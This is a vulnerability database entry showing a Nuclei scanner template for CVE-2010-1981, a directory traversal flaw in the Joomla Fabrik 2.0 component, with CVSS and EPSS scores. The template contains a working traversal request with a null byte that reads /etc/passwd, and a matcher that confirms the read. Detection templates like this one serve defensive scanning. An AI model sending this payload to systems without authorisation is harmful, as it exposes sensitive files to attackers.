Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-1981
HistorySep 01, 2021 - 8:29 a.m.

Joomla! Component Fabrik 2.0 - Local File Inclusion

2021-09-0108:29:40
ProjectDiscovery
github.com
6
cve
joomla
fabrikar
lfi
exploit-db
packetstorm
remote
access
traversal
vulnerability

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

AI Score

5.6

Confidence

High

EPSS

0.007

Percentile

79.6%

A directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-1981

info:
  name: Joomla! Component Fabrik 2.0 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12087
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1981
    - http://packetstormsecurity.org/1004-exploits/joomlafabrik-lfi.txt
    - http://www.exploit-db.com/exploits/12087
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/57571
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
    cvss-score: 6.8
    cve-id: CVE-2010-1981
    cwe-id: CWE-22
    epss-score: 0.00656
    epss-percentile: 0.79446
    cpe: cpe:2.3:a:fabrikar:fabrik:2.0:*:*:*:*:joomla\!:*:*
  metadata:
    max-request: 1
    vendor: fabrikar
    product: fabrik
    framework: joomla\!
  tags: cve,cve2010,joomla,lfi,edb,packetstorm,fabrikar,joomla\!

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100808d072b688a3b3ea4d04558291a5e08c4675e3eeeb07213dfedd29ef0c1c9f0022067528ebbbb4fa1b6fca937a8be9cd70474980c75469e958e712636b5e69b9818:922c64590222798bb761d5b6d8e72950

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

AI Score

5.6

Confidence

High

EPSS

0.007

Percentile

79.6%

Related for NUCLEI:CVE-2010-1981